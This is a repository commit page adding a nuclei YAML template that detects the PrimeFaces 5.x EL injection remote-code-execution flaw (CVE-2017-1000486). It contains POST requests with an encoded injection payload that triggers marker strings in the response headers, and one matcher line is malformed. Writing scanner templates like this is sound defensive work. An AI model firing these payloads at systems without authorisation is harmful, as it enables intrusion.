daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add Detection for PrimeFaces 5.x EL Injection (CVE-2017-1000486)

patch-1
Moritz 2021-05-27 10:17:31 +02:00
parent 04023d98b5
commit 24bcb23857
1 changed files with 38 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
cves/2017/CVE-2017-1000486.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2017-1000486
info:
name: CVE-2017-1000486
author: Moritz Nentwig
severity: low
description: Detection for PrimeFaces 5.x EL Injection (CVE-2017-1000486), a RCE vulnerability that can be used to gain Remote Code Execution on a target.
requests:
- method: POST
path:
- "{{BaseURL}}/javax.faces.resource/dynamiccontent.properties.xhtml"
body: "pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D"
headers:
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:CVE-2017-1000486
- 'MOGWAILABS'
- 'CHECKCHECK'
part: header
redirect: true
- method: POST
path:
- "{{BaseURL}}/javax.faces.resource/dynamiccontent.properties.jsf"
body: "pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D"
headers:
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:
- 'MOGWAILABS'
- 'CHECKCHECK'
part: header
redirect: true